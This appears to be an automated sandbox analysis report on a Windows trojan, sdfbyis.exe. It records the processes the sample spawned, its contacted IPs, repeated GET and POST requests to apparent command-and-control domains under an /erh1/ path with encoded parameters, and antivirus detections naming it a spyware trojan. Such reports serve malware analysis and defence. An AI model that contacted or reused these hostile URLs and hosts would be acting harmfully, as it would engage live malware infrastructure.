Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 20, 2023, 6:27 p.m. | Feb. 20, 2023, 6:29 p.m. |
-
-
sdfbyis.exe "C:\Users\test22\AppData\Local\Temp\sdfbyis.exe" C:\Users\test22\AppData\Local\Temp\wkzlayk.v
2136-
sdfbyis.exe "C:\Users\test22\AppData\Local\Temp\sdfbyis.exe"
2208
-
-
IP Address | Status | Action |
---|---|---|
154.36.192.148 | Active | Moloch |
154.37.38.226 | Active | Moloch |
164.124.101.2 | Active | Moloch |
192.64.116.162 | Active | Moloch |
198.54.117.242 | Active | Moloch |
199.15.163.128 | Active | Moloch |
204.93.169.182 | Active | Moloch |
45.33.6.223 | Active | Moloch |
5.101.152.161 | Active | Moloch |
95.216.161.178 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
section | .ndata |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.iidethakur.xyz/erh1/?em=RTH9mQA/n/TNXPfYm1IQ7kHa2Q5nsTC6kRfi+yFPN0Z6FU6dgArPOJWDHQBf5RE1GBDoONRo0qQWV1gcrPNWuxRml6P17NRo//cHjbw=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.ectdamageoutlaytospe.xyz/erh1/?em=AHcw5OXb/Gm0OTCfDKZ3JK2DxYhw9RKBtUxAFBdta5MKTtGQWXSj63XVCvwVGfb92Yl3Ufjg0V67zzvooSJHcwgpn+BJcL90O6dhoL8=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.chiyiqian.net/erh1/?em=8yvHrbMZKMPX4G7f9erTK5Qf9jc5QJU63StCeoHWCyVfdjdYM9jxH3fQGE5Iu7GP0O1mEzOAIrrJFf6p4gJURBs6dEGFAV/evzhFOwU=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.botanica-online.ru/erh1/?em=do8xsgN913Pnny2aQ+UK0nDZkGlYRkt5zPJAoWdaBDk5pObX0g+xLOXXB+ddgWePhlrLLqA2L4+lJsdSAyHVXgmknCRuXBaZ2Yv2Mew=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.bleclear.xyz/erh1/?em=Z0WuN7dkRWVSR17LZJVNMUwcuzExK0sMDp8JW5x4tCvk4vgayadIan3yifpjez9lQ/1VNOuDl27ov1rCEZ0+qWmIWB6a3zv1qxdGx5k=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.fieldzerohealth.com/erh1/?em=2fftqGAYz6+U6LebbRvkYVCnpFDwwjkXc5V+lmDsVDhPAKcfcJvMu1TqUMUx5Sl5ugQ4b/H1oW7OweiN6k/YFLbPvlSp+kJlDYXlmiM=&vxk=R4T_9gGjkVANzOLb | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.nnhuigou.com/erh1/?em=zgUlILOmccKllncYZi7rpx3Dy3rd1czJYU7gexZDdnilDjeuG+4Wva/CQyP1Xrup3QMjHCP+/VcwhY9vPmUWjWt3CJ1rvTCIIXYKhA4=&vxk=R4T_9gGjkVANzOLb |
request | GET http://www.iidethakur.xyz/erh1/?em=RTH9mQA/n/TNXPfYm1IQ7kHa2Q5nsTC6kRfi+yFPN0Z6FU6dgArPOJWDHQBf5RE1GBDoONRo0qQWV1gcrPNWuxRml6P17NRo//cHjbw=&vxk=R4T_9gGjkVANzOLb |
request | GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip |
request | POST http://www.ectdamageoutlaytospe.xyz/erh1/ |
request | GET http://www.ectdamageoutlaytospe.xyz/erh1/?em=AHcw5OXb/Gm0OTCfDKZ3JK2DxYhw9RKBtUxAFBdta5MKTtGQWXSj63XVCvwVGfb92Yl3Ufjg0V67zzvooSJHcwgpn+BJcL90O6dhoL8=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.chiyiqian.net/erh1/ |
request | GET http://www.chiyiqian.net/erh1/?em=8yvHrbMZKMPX4G7f9erTK5Qf9jc5QJU63StCeoHWCyVfdjdYM9jxH3fQGE5Iu7GP0O1mEzOAIrrJFf6p4gJURBs6dEGFAV/evzhFOwU=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.botanica-online.ru/erh1/ |
request | GET http://www.botanica-online.ru/erh1/?em=do8xsgN913Pnny2aQ+UK0nDZkGlYRkt5zPJAoWdaBDk5pObX0g+xLOXXB+ddgWePhlrLLqA2L4+lJsdSAyHVXgmknCRuXBaZ2Yv2Mew=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.bleclear.xyz/erh1/ |
request | GET http://www.bleclear.xyz/erh1/?em=Z0WuN7dkRWVSR17LZJVNMUwcuzExK0sMDp8JW5x4tCvk4vgayadIan3yifpjez9lQ/1VNOuDl27ov1rCEZ0+qWmIWB6a3zv1qxdGx5k=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.fieldzerohealth.com/erh1/ |
request | GET http://www.fieldzerohealth.com/erh1/?em=2fftqGAYz6+U6LebbRvkYVCnpFDwwjkXc5V+lmDsVDhPAKcfcJvMu1TqUMUx5Sl5ugQ4b/H1oW7OweiN6k/YFLbPvlSp+kJlDYXlmiM=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.nnhuigou.com/erh1/ |
request | GET http://www.nnhuigou.com/erh1/?em=zgUlILOmccKllncYZi7rpx3Dy3rd1czJYU7gexZDdnilDjeuG+4Wva/CQyP1Xrup3QMjHCP+/VcwhY9vPmUWjWt3CJ1rvTCIIXYKhA4=&vxk=R4T_9gGjkVANzOLb |
request | POST http://www.kioro.net/erh1/ |
request | POST http://www.ectdamageoutlaytospe.xyz/erh1/ |
request | POST http://www.chiyiqian.net/erh1/ |
request | POST http://www.botanica-online.ru/erh1/ |
request | POST http://www.bleclear.xyz/erh1/ |
request | POST http://www.fieldzerohealth.com/erh1/ |
request | POST http://www.nnhuigou.com/erh1/ |
request | POST http://www.kioro.net/erh1/ |
domain | www.botanica-online.ru | description | Russian Federation domain TLD |
file | C:\Users\test22\AppData\Local\Temp\sdfbyis.exe |
MicroWorld-eScan | Trojan.NSISX.Spy.Gen.24 |
FireEye | Generic.mg.41cc45fca60b8167 |
VIPRE | Trojan.NSISX.Spy.Gen.24 |
Sangfor | Suspicious.Win32.Save.ins |
CrowdStrike | win/malicious_confidence_100% (D) |
Arcabit | Trojan.NSISX.Spy.Gen.24 |
Symantec | Packed.NSISPacker!g14 |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.NSISX.Spy.Gen.24 |
Avast | Win32:PWSX-gen [Trj] |
Sophos | Generic ML PUA (PUA) |
F-Secure | Heuristic.HEUR/AGEN.1213060 |
McAfee-GW-Edition | BehavesLike.Win32.ICLoader.fc |
Trapmine | malicious.moderate.ml.score |
Emsisoft | Trojan.NSISX.Spy.Gen.24 (B) |
SentinelOne | Static AI - Suspicious PE |
Avira | HEUR/AGEN.1213060 |
Microsoft | Trojan:Win32/Sabsik.TE.B!ml |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Trojan.NSISX.Spy.Gen.24 |
Detected | |
AhnLab-V3 | Trojan/Win.Agent.C5382526 |
BitDefenderTheta | Gen:NN.ZexaF.36276.suW@a8PWqNki |
ALYac | Trojan.NSISX.Spy.Gen.24 |
MAX | malware (ai score=86) |
Ikarus | Trojan.Inject |
Fortinet | W32/Injector_AGen.PZ!tr |
AVG | Win32:PWSX-gen [Trj] |
Cybereason | malicious.4de436 |